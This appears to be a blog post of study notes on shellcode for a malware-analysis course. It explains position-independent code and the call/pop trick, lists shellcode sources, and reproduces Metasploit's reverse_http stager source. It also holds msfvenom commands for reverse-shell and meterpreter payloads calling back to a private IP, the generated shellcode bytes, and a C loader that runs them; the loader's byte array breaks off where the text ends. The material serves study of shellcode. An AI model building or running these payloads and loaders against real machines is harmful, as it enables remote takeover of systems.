Practical Malware Analysis, Chapter 19: Shellcode

Author: doinb1517 | Published: 2022-09-18 01:16


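Shellcode is a payload of raw executable code. The name comes from the fact that attackers typically used this code to gain access to an interactive shell on the compromised system. Over time, however, the term has come to describe any self-contained piece of executable code.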

Loading shellcode for analysis

1. shellcode_launcher.exe: https://github.com/clinicallyinane/shellcode_launcher
2. IDA Pro: shellcode can be analyzed manually in IDA Pro
3. scdbg: run the shellcode with scdbg, https://github.com/dzzie/SCDBG

Where to get shellcode

shell-storm

Link: https://shell-storm.org/shellcode/

storm.png

exploit-db

Link: https://www.exploit-db.com/

Far fewer shellcode samples are available here.

exploit.png

cobaltstrike

Cobalt Strike (CS) can also generate shellcode; the principle is similar to msf.

msfvenom

msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.204.128 LPORT=4466 -a x86 -f c

msfvenom.png
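The `-f c` output is a C string literal, while tools such as shellcode_launcher.exe and scdbg usually want a raw byte file. The following is a minimal sketch of that conversion. The helper name `c_array_to_bytes` is an assumption made for this example, and the sample bytes are simply the first 18 bytes of the reverse_http dump shown later in this article.

```python
import re

def c_array_to_bytes(c_source):
    """Collect every \\xNN escape found inside double-quoted C string literals."""
    out = bytearray()
    # Each literal is one quoted run of \xNN escapes, as msfvenom -f c prints them.
    for literal in re.findall(r'"((?:\\x[0-9a-fA-F]{2})+)"', c_source):
        out += bytes(int(h, 16) for h in re.findall(r'\\x([0-9a-fA-F]{2})', literal))
    return bytes(out)

# Hypothetical, shortened sample in the same layout as msfvenom's C output.
sample = r'''
unsigned char buf[] =
"\xfc\xe8\x8f\x00\x00\x00\x60\x31\xd2\x89\xe5\x64\x8b\x52\x30"
"\x8b\x52\x0c";
'''

raw = c_array_to_bytes(sample)
print(len(raw), raw[:2].hex())
```

Writing `raw` to a file with `open(path, "wb")` then gives a blob that can be handed to a loader or emulator.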

pwntools

Link: https://docs.pwntools.com/en/stable/shellcraft.html

pwntool.png

Position-independent code

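Position-independent code (PIC), a term closely related to position-independent executable (PIE), is code that does not use hard-coded addresses to reference instructions or data. PIC is widely used in shared libraries, so that the code of a single library can be loaded into the address spaces of different processes. PIC is also used on computer systems that lack a memory management unit, where it lets the operating system keep different running programs apart within a single address space. Shellcode is position-independent code. It cannot assume that it will be loaded at a particular memory location when it executes, because at run time different versions of a vulnerable program may load the shellcode at different memory locations. Shellcode must make sure that every memory access to code and data uses PIC techniques.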

bb.png

Identifying the execution location

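To access data in a position-independent way, shellcode needs to dereference a base pointer. Adding an offset to this base pointer, or subtracting one from it, lets the shellcode safely reach the data embedded in it. Because the x86 instruction set does not provide EIP-relative addressing for data access, but only for control-flow instructions, a general-purpose register must first be loaded with the current instruction pointer so that it can serve as the base pointer.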

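Obtaining the current instruction pointer is not straightforward, because on x86 systems software cannot access the instruction pointer directly. In fact, the instruction mov eax, eip cannot be assembled, so there is no way to load the current instruction pointer straight into a general-purpose register. Shellcode commonly works around this with one of two techniques: the call/pop instructions and the fnstenv instruction.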

Using the call/pop instructions

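When a call instruction executes, the processor pushes the address of the instruction following the call onto the stack and then transfers execution to the requested location. When the called function finishes, it executes a ret instruction, which pops the return address off the top of the stack and loads it into the instruction pointer register. As a result, execution resumes at the instruction right after the call.

Shellcode can abuse this convention by executing a pop instruction immediately after a call, which loads the address that follows the call into the chosen register.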

call.png
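The effect of call/pop can be checked without running any machine code. The sketch below decodes a `call rel32` (opcode 0xE8), works out the return address the processor would push, and confirms that the call target is a `pop r32` (opcodes 0x58 to 0x5F). The function name `emulate_call_pop` and the two load addresses are assumptions chosen for illustration; the six-byte stub is the classic `call $+5 ; pop ebx` pair.

```python
import struct

# Register order used by the x86 `pop r32` encoding (0x58 + register number).
POP_REGISTERS = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]

def emulate_call_pop(code, load_address, call_offset=0):
    """Return (register, value) loaded by a `call rel32` whose target is a `pop r32`."""
    if code[call_offset] != 0xE8:
        raise ValueError("expected a call rel32 (opcode 0xE8)")
    (rel32,) = struct.unpack_from("<i", code, call_offset + 1)
    return_offset = call_offset + 5        # offset of the byte right after the call
    target_offset = return_offset + rel32  # where execution continues
    opcode = code[target_offset]
    if not 0x58 <= opcode <= 0x5F:
        raise ValueError("call target is not a pop r32")
    # The pop receives the pushed return address, wherever the code was loaded.
    return POP_REGISTERS[opcode - 0x58], load_address + return_offset

stub = bytes.fromhex("e8000000005b")  # call $+5 ; pop ebx
for base in (0x00401000, 0x7FFE0000):
    reg, value = emulate_call_pop(stub, base)
    print(f"loaded at {base:#010x}: {reg} = {value:#010x}")
```

The same bytes yield a different register value at each load address, which is exactly the property shellcode needs from a base pointer.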

In practice:

Link: reverse_http in Metasploit

https://github.com/rapid7/metasploit-framework/blob/ec4c45f14531b4e935ab92b731db68b7c9d76f7c/lib/msf/core/payload/windows/reverse_http.rb

# -*- coding: binary -*-

module Msf

###
#
# Complex payload generation for Windows ARCH_X86 that speak HTTP(S)
#
###

module Payload::Windows::ReverseHttp

  include Msf::Payload::TransportConfig
  include Msf::Payload::Windows
  include Msf::Payload::Windows::BlockApi
  include Msf::Payload::Windows::Exitfunk
  include Msf::Payload::UUID::Options

  #
  # Register reverse_http specific options
  #
  def initialize(*args)
    super
    register_advanced_options(
      [ OptInt.new('StagerURILength', 'The URI length for the stager (at least 5 bytes)') ] +
      Msf::Opt::stager_retry_options +
      Msf::Opt::http_header_options +
      Msf::Opt::http_proxy_options
    )
  end

  #
  # Generate the first stage
  #
  def generate(opts={})
    ds = opts[:datastore] || datastore
    conf = {
      ssl:         opts[:ssl] || false,
      host:        ds['LHOST'] || '127.127.127.127',
      port:        ds['LPORT'],
      retry_count: ds['StagerRetryCount'],
      retry_wait:  ds['StagerRetryWait']
    }

    # Add extra options if we have enough space
    if self.available_space.nil? || (cached_size && required_space <= self.available_space)
      conf[:url]            = luri + generate_uri(opts)
      conf[:exitfunk]       = ds['EXITFUNC']
      conf[:ua]             = ds['HttpUserAgent']
      conf[:proxy_host]     = ds['HttpProxyHost']
      conf[:proxy_port]     = ds['HttpProxyPort']
      conf[:proxy_user]     = ds['HttpProxyUser']
      conf[:proxy_pass]     = ds['HttpProxyPass']
      conf[:proxy_type]     = ds['HttpProxyType']
      conf[:custom_headers] = get_custom_headers(ds)
    else
      # Otherwise default to small URIs
      conf[:url]        = luri + generate_small_uri
    end

    generate_reverse_http(conf)
  end

  #
  # Generate the custom headers string
  #
  def get_custom_headers(ds)
    headers = ""
    headers << "Host: #{ds['HttpHostHeader']}\r\n" if ds['HttpHostHeader']
    headers << "Cookie: #{ds['HttpCookie']}\r\n" if ds['HttpCookie']
    headers << "Referer: #{ds['HttpReferer']}\r\n" if ds['HttpReferer']

    if headers.length > 0
      headers
    else
      nil
    end
  end

  #
  # Generate and compile the stager
  #
  def generate_reverse_http(opts={})
    combined_asm = %Q^
      cld                    ; Clear the direction flag.
      call start             ; Call start, this pushes the address of 'api_call' onto the stack.
      #{asm_block_api}
      start:
        pop ebp
      #{asm_reverse_http(opts)}
    ^
    Metasm::Shellcode.assemble(Metasm::X86.new, combined_asm).encode_string
  end

  #
  # Generate the transport-specific configuration
  #
  def transport_config(opts={})
    transport_config_reverse_http(opts)
  end

  #
  # Generate the URI for the initial stager
  #
  def generate_uri(opts={})
    ds = opts[:datastore] || datastore
    uri_req_len = ds['StagerURILength'].to_i

    # Choose a random URI length between 30 and 255 bytes
    if uri_req_len == 0
      uri_req_len = 30 + luri.length + rand(256 - (30 + luri.length))
    end

    if uri_req_len < 5
      raise ArgumentError, "Minimum StagerURILength is 5"
    end

    generate_uri_uuid_mode(:init_native, uri_req_len)
  end

  #
  # Generate the URI for the initial stager
  #
  def generate_small_uri
    generate_uri_uuid_mode(:init_native, 30)
  end

  #
  # Determine the maximum amount of space required for the features requested
  #
  def required_space
    # Start with our cached default generated size
    space = cached_size

    # Add 100 bytes for the encoder to have some room
    space += 100

    # Make room for the maximum possible URL length
    space += 256

    # EXITFUNK processing adds 31 bytes at most (for ExitThread, only ~16 for others)
    space += 31

    # Proxy options?
    space += 200

    # Custom headers? Ugh, impossible to tell
    space += 512

    # The final estimated size
    space
  end

  #
  # Convert a string into a NULL-terminated ASCII byte array
  #
  def asm_generate_ascii_array(str)
    (str.to_s + "\x00").
      unpack("C*").
      map{ |c| "0x%.2x" % c }.
      join(",")
  end

  #
  # Generate an assembly stub with the configured feature set and options.
  #
  # @option opts [Bool] :ssl Whether or not to enable SSL
  # @option opts [String] :url The URI to request during staging
  # @option opts [String] :host The host to connect to
  # @option opts [Integer] :port The port to connect to
  # @option opts [String] :exitfunk The exit method to use if there is an error, one of process, thread, or seh
  # @option opts [String] :proxy_host The optional proxy server host to use
  # @option opts [Integer] :proxy_port The optional proxy server port to use
  # @option opts [String] :proxy_type The optional proxy server type, one of HTTP or SOCKS
  # @option opts [String] :proxy_user The optional proxy server username
  # @option opts [String] :proxy_pass The optional proxy server password
  # @option opts [String] :custom_headers The optional collection of custom headers for the payload.
  # @option opts [Integer] :retry_count The number of times to retry a failed request before giving up
  # @option opts [Integer] :retry_wait The seconds to wait before retry a new request
  #
  def asm_reverse_http(opts={})

    retry_count   = opts[:retry_count].to_i
    retry_wait   = opts[:retry_wait].to_i * 1000
    proxy_enabled = !!(opts[:proxy_host].to_s.strip.length > 0)
    proxy_info    = ""

    if proxy_enabled
      if opts[:proxy_type].to_s.downcase == "socks"
        proxy_info << "socks="
      else
        proxy_info << "http://"
      end

      proxy_info << opts[:proxy_host].to_s
      if opts[:proxy_port].to_i > 0
        proxy_info << ":#{opts[:proxy_port]}"
      end
    end

    proxy_user = opts[:proxy_user].to_s.length == 0 ? nil : opts[:proxy_user]
    proxy_pass = opts[:proxy_pass].to_s.length == 0 ? nil : opts[:proxy_pass]

    custom_headers = opts[:custom_headers].to_s.length == 0 ? nil : asm_generate_ascii_array(opts[:custom_headers])

    http_open_flags = 0
    secure_flags = 0

    if opts[:ssl]
      http_open_flags = (
        0x80000000 | # INTERNET_FLAG_RELOAD
        0x04000000 | # INTERNET_NO_CACHE_WRITE
        0x00400000 | # INTERNET_FLAG_KEEP_CONNECTION
        0x00200000 | # INTERNET_FLAG_NO_AUTO_REDIRECT
        0x00080000 | # INTERNET_FLAG_NO_COOKIES
        0x00000200 | # INTERNET_FLAG_NO_UI
        0x00800000 | # INTERNET_FLAG_SECURE
        0x00002000 | # INTERNET_FLAG_IGNORE_CERT_DATE_INVALID
        0x00001000 ) # INTERNET_FLAG_IGNORE_CERT_CN_INVALID

      secure_flags = (
        0x00002000 | # SECURITY_FLAG_IGNORE_CERT_DATE_INVALID
        0x00001000 | # SECURITY_FLAG_IGNORE_CERT_CN_INVALID
        0x00000200 | # SECURITY_FLAG_IGNORE_WRONG_USAGE
        0x00000100 | # SECURITY_FLAG_IGNORE_UNKNOWN_CA
        0x00000080 ) # SECURITY_FLAG_IGNORE_REVOCATION
    else
      http_open_flags = (
        0x80000000 | # INTERNET_FLAG_RELOAD
        0x04000000 | # INTERNET_NO_CACHE_WRITE
        0x00400000 | # INTERNET_FLAG_KEEP_CONNECTION
        0x00200000 | # INTERNET_FLAG_NO_AUTO_REDIRECT
        0x00080000 | # INTERNET_FLAG_NO_COOKIES
        0x00000200 ) # INTERNET_FLAG_NO_UI
    end

    asm = %Q^
      ;-----------------------------------------------------------------------------;
      ; Compatible: Confirmed Windows 8.1, Windows 7, Windows 2008 Server, Windows XP SP1, Windows SP3, Windows 2000
      ; Known Bugs: Incompatible with Windows NT 4.0, buggy on Windows XP Embedded (SP1)
      ;-----------------------------------------------------------------------------;

      ; Input: EBP must be the address of 'api_call'.
      ; Clobbers: EAX, ESI, EDI, ESP will also be modified (-0x1A0)
      load_wininet:
        push 0x0074656e        ; Push the bytes 'wininet',0 onto the stack.
        push 0x696e6977        ; ...
        push esp               ; Push a pointer to the "wininet" string on the stack.
        push #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')}
        call ebp               ; LoadLibraryA( "wininet" )
        xor ebx, ebx           ; Set ebx to NULL to use in future arguments
    ^

    asm << %Q^
    internetopen:
      push ebx               ; DWORD dwFlags
    ^
    if proxy_enabled
      asm << %Q^
        push esp               ; LPCTSTR lpszProxyBypass ("" = empty string)
      call get_proxy_server
        db "#{proxy_info}", 0x00
      get_proxy_server:
                               ; LPCTSTR lpszProxyName (via call)
        push 3                 ; DWORD dwAccessType (INTERNET_OPEN_TYPE_PROXY = 3)
      ^
    else
      asm << %Q^
        push ebx               ; LPCTSTR lpszProxyBypass (NULL)
        push ebx               ; LPCTSTR lpszProxyName (NULL)
        push ebx               ; DWORD dwAccessType (PRECONFIG = 0)
      ^
    end
    if opts[:ua].nil?
      asm << %Q^
        push ebx               ; LPCTSTR lpszAgent (NULL)
      ^
    else
      asm << %Q^
        push ebx               ; LPCTSTR lpszProxyBypass (NULL)
      call get_useragent
        db "#{opts[:ua]}", 0x00
                               ; LPCTSTR lpszAgent (via call)
      get_useragent:
      ^
    end
    asm << %Q^
      push #{Rex::Text.block_api_hash('wininet.dll', 'InternetOpenA')}
      call ebp
    ^

    asm << %Q^
      internetconnect:
        push ebx               ; DWORD_PTR dwContext (NULL)
        push ebx               ; dwFlags
        push 3                 ; DWORD dwService (INTERNET_SERVICE_HTTP)
        push ebx               ; password (NULL)
        push ebx               ; username (NULL)
        push #{opts[:port]}    ; PORT
        call got_server_uri    ; double call to get pointer for both server_uri and
      server_uri:              ; server_host; server_uri is saved in EDI for later
        db "#{opts[:url]}", 0x00
      got_server_host:
        push eax               ; HINTERNET hInternet (still in eax from InternetOpenA)
        push #{Rex::Text.block_api_hash('wininet.dll', 'InternetConnectA')}
        call ebp
        mov esi, eax           ; Store hConnection in esi
    ^

    # Note: wine-1.6.2 does not support SSL w/proxy authentication properly, it
    # doesn't set the Proxy-Authorization header on the CONNECT request.

    if proxy_enabled && proxy_user
      asm << %Q^
        ; DWORD dwBufferLength (length of username)
        push #{proxy_user.length}
        call set_proxy_username
      proxy_username:
        db "#{proxy_user}",0x00
      set_proxy_username:
                             ; LPVOID lpBuffer (username from previous call)
        push 43              ; DWORD dwOption (INTERNET_OPTION_PROXY_USERNAME)
        push esi             ; hConnection
        push #{Rex::Text.block_api_hash('wininet.dll', 'InternetSetOptionA')}
        call ebp
      ^
    end

    if proxy_enabled && proxy_pass
      asm << %Q^
        ; DWORD dwBufferLength (length of password)
        push #{proxy_pass.length}
        call set_proxy_password
      proxy_password:
        db "#{proxy_pass}",0x00
      set_proxy_password:
                             ; LPVOID lpBuffer (password from previous call)
        push 44              ; DWORD dwOption (INTERNET_OPTION_PROXY_PASSWORD)
        push esi             ; hConnection
        push #{Rex::Text.block_api_hash('wininet.dll', 'InternetSetOptionA')}
        call ebp
      ^
    end

    asm << %Q^
      httpopenrequest:
        push ebx               ; dwContext (NULL)
        push #{"0x%.8x" % http_open_flags}   ; dwFlags
        push ebx               ; accept types
        push ebx               ; referrer
        push ebx               ; version
        push edi               ; server URI
        push ebx               ; method
        push esi               ; hConnection
        push #{Rex::Text.block_api_hash('wininet.dll', 'HttpOpenRequestA')}
        call ebp
        xchg esi, eax          ; save hHttpRequest in esi
     ^
    if retry_count > 0
      asm << %Q^
      ; Store our retry counter in the edi register
      set_retry:
        push #{retry_count}
        pop edi
      ^
    end

    asm << %Q^
      send_request:
    ^

    if opts[:ssl]
      asm << %Q^
      ; InternetSetOption (hReq, INTERNET_OPTION_SECURITY_FLAGS, &dwFlags, sizeof (dwFlags) );
      set_security_options:
        push 0x#{secure_flags.to_s(16)}
       mov eax, esp
        push 4                 ; sizeof(dwFlags)
        push eax               ; &dwFlags
        push 31                ; DWORD dwOption (INTERNET_OPTION_SECURITY_FLAGS)
        push esi               ; hHttpRequest
        push #{Rex::Text.block_api_hash('wininet.dll', 'InternetSetOptionA')}
        call ebp
      ^
    end

    asm << %Q^
      httpsendrequest:
        push ebx               ; lpOptional length (0)
        push ebx               ; lpOptional (NULL)
    ^

    if custom_headers
      asm << %Q^
        push -1                ; dwHeadersLength (assume NULL terminated)
        call get_req_headers   ; lpszHeaders (pointer to the custom headers)
        db #{custom_headers}
      get_req_headers:
      ^
    else
      asm << %Q^
        push ebx               ; HeadersLength (0)
        push ebx               ; Headers (NULL)
      ^
    end

    asm << %Q^
        push esi               ; hHttpRequest
        push #{Rex::Text.block_api_hash('wininet.dll', 'HttpSendRequestA')}
        call ebp
        test eax,eax
        jnz allocate_memory

     set_wait:
        push #{retry_wait}     ; dwMilliseconds
        push #{Rex::Text.block_api_hash('kernel32.dll', 'Sleep')}
        call ebp               ; Sleep( dwMilliseconds );
      ^

    if retry_count > 0
      asm << %Q^
        try_it_again:
          dec edi
          jnz send_request

        ; if we didn't allocate before running out of retries, bail out
        ^
    else
      asm << %Q^
        try_it_again:
          jmp send_request

        ; retry forever
        ^
    end

    if opts[:exitfunk]
      asm << %Q^
    failure:
      call exitfunk
      ^
    else
      asm << %Q^
    failure:
      push 0x56A2B5F0        ; hardcoded to exitprocess for size
      call ebp
      ^
    end

    if defined?(read_stage_size?) && read_stage_size?
      asm << %Q^
    allocate_memory:
    read_stage_size:
      push ebx               ; temporary storage for stage size
      mov eax, esp           ; pointer to 4b buffer for stage size
      push ebx               ; temporary storage for bytesRead
      mov edi, esp           ; pointer to 4b buffer for bytesRead
      push edi               ; &bytesRead
      push 4                 ; bytes to read
      push eax               ; &stage size
      push esi               ; hRequest
      push #{Rex::Text.block_api_hash('wininet.dll', 'InternetReadFile')}
      call ebp               ; InternetReadFile(hFile, lpBuffer, dwNumberOfBytesToRead, lpdwNumberOfBytesRead)
      pop ebx                ; bytesRead (unused, pop for cleaning)
      pop ebx                ; stage size
      test eax,eax           ; download failed? (optional?)
      jz failure
      xor eax, eax
      push 0x40              ; PAGE_EXECUTE_READWRITE
      push 0x1000            ; MEM_COMMIT
      push ebx               ; Stage allocation
      push eax               ; NULL as we dont care where the allocation is
      push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')}
      call ebp               ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
    download_prep:
      xchg eax, ebx          ; place the allocated base address in ebx
      push ebx               ; store a copy of the stage base address on the stack (for ret later)
      push ebx               ; temporary storage for bytes read count
      mov edi, esp           ; &bytesRead
    download_more:
      push edi               ; &bytesRead
      push eax               ; read length
      push ebx               ; buffer
      push esi               ; hRequest
      push #{Rex::Text.block_api_hash('wininet.dll', 'InternetReadFile')}
      call ebp
      test eax,eax           ; download failed? (optional?)
      jz failure
      pop eax                ; clear the temporary storage for bytesread
    ^
    else
      asm << %Q^
    allocate_memory:
      push 0x40              ; PAGE_EXECUTE_READWRITE
      push 0x1000            ; MEM_COMMIT
      push 0x00400000        ; Stage allocation (4Mb ought to do us)
      push ebx               ; NULL as we dont care where the allocation is
      push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')}
      call ebp               ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );

    download_prep:
      xchg eax, ebx          ; place the allocated base address in ebx
      push ebx               ; store a copy of the stage base address on the stack
      push ebx               ; temporary storage for bytes read count
      mov edi, esp           ; &bytesRead

    download_more:
      push edi               ; &bytesRead
      push 8192              ; read length
      push ebx               ; buffer
      push esi               ; hRequest
      push #{Rex::Text.block_api_hash('wininet.dll', 'InternetReadFile')}
      call ebp

      test eax,eax           ; download failed? (optional?)
      jz failure

      mov eax, [edi]
      add ebx, eax           ; buffer += bytes_received

      test eax,eax           ; optional?
      jnz download_more      ; continue until it returns 0
      pop eax                ; clear the temporary storage
      ^
      end
    asm << %Q^
    execute_stage:
      ret                    ; dive into the stored stage address

    got_server_uri:
      pop edi                ; edi now points to the URL
      call got_server_host

    server_host:
      db "#{opts[:host]}", 0x00
    ^

    if opts[:exitfunk]
      asm << asm_exitfunk(opts)
    end

    asm
  end

  #
  # Do not transmit the stage over the connection.  We handle this via HTTPS
  #
  def stage_over_connection?
    false
  end

  #
  # Always wait at least 20 seconds for this payload (due to staging delays)
  #
  def wfs_delay
    20
  end

end

end
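The listing above never names an API directly in the assembly; it pushes the value of `Rex::Text.block_api_hash(module, function)` and calls `ebp` (the `api_call` stub). The following is a sketch of that hash as a rotate-right-by-13 additive hash, written from the commonly documented behavior of Metasploit's block_api rather than copied from its source, so treat the details as assumptions: the module name is hashed as uppercase UTF-16LE including its terminator, and the function name as ASCII including its terminator. The Python function names are chosen for this example.

```python
def ror32(value, bits):
    """Rotate a 32-bit value right by `bits`."""
    value &= 0xFFFFFFFF
    return ((value >> bits) | (value << (32 - bits))) & 0xFFFFFFFF

def block_api_hash(module, function, bits=13):
    """Sketch of the block_api hash: hash(module) + hash(function), 32-bit."""
    module_hash = 0
    # Assumption: module name is uppercased and hashed byte by byte as UTF-16LE.
    for byte in (module.upper() + "\x00").encode("utf-16-le"):
        module_hash = (ror32(module_hash, bits) + byte) & 0xFFFFFFFF
    function_hash = 0
    # Assumption: function name is hashed as ASCII, terminator included.
    for byte in (function + "\x00").encode("ascii"):
        function_hash = (ror32(function_hash, bits) + byte) & 0xFFFFFFFF
    return (module_hash + function_hash) & 0xFFFFFFFF

for module, function in [("kernel32.dll", "LoadLibraryA"),
                         ("kernel32.dll", "ExitProcess")]:
    print(f"{module}!{function} = 0x{block_api_hash(module, function):08X}")
```

The two values can be compared against the article itself: 0x56A2B5F0 is the constant the Ruby source hardcodes for ExitProcess, and the bytes `\x68\x4c\x77\x26\x07` (push 0x0726774C) appear in the generated shellcode right after the "wininet" string is pushed.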

You can generate the reverse_http shellcode with msfvenom and debug it in Visual Studio.

# Generate the shellcode
┌──(root💀kali)-[/home/kali]
└─# msfvenom -p windows/meterpreter/reverse_http lhost=192.168.204.128 lport=8888 --platform win -f c                     
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 589 bytes
Final size of c file: 2500 bytes
unsigned char buf[] = 
"\xfc\xe8\x8f\x00\x00\x00\x60\x31\xd2\x89\xe5\x64\x8b\x52\x30"
"\x8b\x52\x0c\x8b\x52\x14\x0f\xb7\x4a\x26\x31\xff\x8b\x72\x28"
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\x49"
"\x75\xef\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78"
"\x85\xc0\x74\x4c\x01\xd0\x8b\x48\x18\x50\x8b\x58\x20\x01\xd3"
"\x85\xc9\x74\x3c\x49\x31\xff\x8b\x34\x8b\x01\xd6\x31\xc0\xc1"
"\xcf\x0d\xac\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24"
"\x75\xe0\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c"
"\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59"
"\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xe9\x80\xff\xff\xff\x5d"
"\x68\x6e\x65\x74\x00\x68\x77\x69\x6e\x69\x54\x68\x4c\x77\x26"
"\x07\xff\xd5\x31\xdb\x53\x53\x53\x53\x53\xe8\x52\x00\x00\x00"
"\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x4d\x61"
"\x63\x69\x6e\x74\x6f\x73\x68\x3b\x20\x49\x6e\x74\x65\x6c\x20"
"\x4d\x61\x63\x20\x4f\x53\x20\x58\x20\x31\x32\x2e\x32\x3b\x20"
"\x72\x76\x3a\x39\x37\x2e\x30\x29\x20\x47\x65\x63\x6b\x6f\x2f"
"\x32\x30\x31\x30\x30\x31\x30\x31\x20\x46\x69\x72\x65\x66\x6f"
"\x78\x2f\x39\x37\x2e\x30\x00\x68\x3a\x56\x79\xa7\xff\xd5\x53"
"\x53\x6a\x03\x53\x53\x68\xb8\x22\x00\x00\xe8\x10\x01\x00\x00"
"\x2f\x51\x48\x62\x54\x52\x74\x42\x35\x38\x49\x5a\x4a\x36\x30"
"\x6a\x71\x4b\x73\x74\x52\x30\x67\x5a\x48\x57\x59\x5a\x74\x39"
"\x64\x35\x6b\x76\x79\x47\x58\x41\x61\x4f\x53\x77\x43\x42\x79"
"\x33\x65\x5f\x7a\x75\x37\x31\x58\x2d\x4d\x2d\x58\x76\x77\x70"
"\x53\x77\x43\x53\x5f\x77\x35\x35\x43\x4b\x73\x6f\x52\x70\x49"
"\x59\x47\x31\x6b\x33\x6f\x4f\x6d\x7a\x67\x74\x51\x32\x6f\x33"
"\x75\x6d\x63\x58\x36\x5f\x67\x7a\x7a\x66\x4a\x79\x5f\x5a\x7a"
"\x7a\x68\x31\x76\x65\x56\x4f\x6a\x79\x52\x36\x55\x65\x54\x48"
"\x42\x73\x6a\x44\x69\x76\x7a\x4d\x4f\x50\x67\x4d\x32\x54\x78"
"\x79\x48\x33\x46\x4a\x30\x66\x6c\x30\x50\x39\x74\x30\x00\x50"
"\x68\x57\x89\x9f\xc6\xff\xd5\x89\xc6\x53\x68\x00\x02\x68\x84"
"\x53\x53\x53\x57\x53\x56\x68\xeb\x55\x2e\x3b\xff\xd5\x96\x6a"
"\x0a\x5f\x53\x53\x53\x53\x56\x68\x2d\x06\x18\x7b\xff\xd5\x85"
"\xc0\x75\x14\x68\x88\x13\x00\x00\x68\x44\xf0\x35\xe0\xff\xd5"
"\x4f\x75\xe1\xe8\x4c\x00\x00\x00\x6a\x40\x68\x00\x10\x00\x00"
"\x68\x00\x00\x40\x00\x53\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53"
"\x53\x89\xe7\x57\x68\x00\x20\x00\x00\x53\x56\x68\x12\x96\x89"
"\xe2\xff\xd5\x85\xc0\x74\xcf\x8b\x07\x01\xc3\x85\xc0\x75\xe5"
"\x58\xc3\x5f\xe8\x7f\xff\xff\xff\x31\x39\x32\x2e\x31\x36\x38"
"\x2e\x32\x30\x34\x2e\x31\x32\x38\x00\xbb\xf0\xb5\xa2\x56\x6a"
"\x00\x53\xff\xd5";


# Load the shellcode in VS
#include "test.h"
#include <windows.h>
#include <stdio.h>
#include <string.h>   /* memcpy */
#pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"")
#pragma comment(linker,"/MERGE:.rdata=.text /MERGE:.data=.text /SECTION:.text,EWR")

unsigned char shellcode[] =
"\xfc\xe8\x8f\x00\x00\x00\x60\x31\xd2\x89\xe5\x64\x8b\x52\x30"
"\x8b\x52\x0c\x8b\x52\x14\x0f\xb7\x4a\x26\x31\xff\x8b\x72\x28"
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\x49"
"\x75\xef\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78"
"\x85\xc0\x74\x4c\x01\xd0\x8b\x48\x18\x50\x8b\x58\x20\x01\xd3"
"\x85\xc9\x74\x3c\x49\x31\xff\x8b\x34\x8b\x01\xd6\x31\xc0\xc1"
"\xcf\x0d\xac\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24"
"\x75\xe0\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c"
"\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59"
"\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xe9\x80\xff\xff\xff\x5d"
"\x68\x6e\x65\x74\x00\x68\x77\x69\x6e\x69\x54\x68\x4c\x77\x26"
"\x07\xff\xd5\x31\xdb\x53\x53\x53\x53\x53\xe8\x52\x00\x00\x00"
"\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x4d\x61"
"\x63\x69\x6e\x74\x6f\x73\x68\x3b\x20\x49\x6e\x74\x65\x6c\x20"
"\x4d\x61\x63\x20\x4f\x53\x20\x58\x20\x31\x32\x2e\x32\x3b\x20"
"\x72\x76\x3a\x39\x37\x2e\x30\x29\x20\x47\x65\x63\x6b\x6f\x2f"
"\x32\x30\x31\x30\x30\x31\x30\x31\x20\x46\x69\x72\x65\x66\x6f"
"\x78\x2f\x39\x37\x2e\x30\x00\x68\x3a\x56\x79\xa7\xff\xd5\x53"
"\x53\x6a\x03\x53\x53\x68\xb8\x22\x00\x00\xe8\x10\x01\x00\x00"
"\x2f\x51\x48\x62\x54\x52\x74\x42\x35\x38\x49\x5a\x4a\x36\x30"
"\x6a\x71\x4b\x73\x74\x52\x30\x67\x5a\x48\x57\x59\x5a\x74\x39"
"\x64\x35\x6b\x76\x79\x47\x58\x41\x61\x4f\x53\x77\x43\x42\x79"
"\x33\x65\x5f\x7a\x75\x37\x31\x58\x2d\x4d\x2d\x58\x76\x77\x70"
"\x53\x77\x43\x53\x5f\x77\x35\x35\x43\x4b\x73\x6f\x52\x70\x49"
"\x59\x47\x31\x6b\x33\x6f\x4f\x6d\x7a\x67\x74\x51\x32\x6f\x33"
"\x75\x6d\x63\x58\x36\x5f\x67\x7a\x7a\x66\x4a\x79\x5f\x5a\x7a"
"\x7a\x68\x31\x76\x65\x56\x4f\x6a\x79\x52\x36\x55\x65\x54\x48"
"\x42\x73\x6a\x44\x69\x76\x7a\x4d\x4f\x50\x67\x4d\x32\x54\x78"
"\x79\x48\x33\x46\x4a\x30\x66\x6c\x30\x50\x39\x74\x30\x00\x50"
"\x68\x57\x89\x9f\xc6\xff\xd5\x89\xc6\x53\x68\x00\x02\x68\x84"
"\x53\x53\x53\x57\x53\x56\x68\xeb\x55\x2e\x3b\xff\xd5\x96\x6a"
"\x0a\x5f\x53\x53\x53\x53\x56\x68\x2d\x06\x18\x7b\xff\xd5\x85"
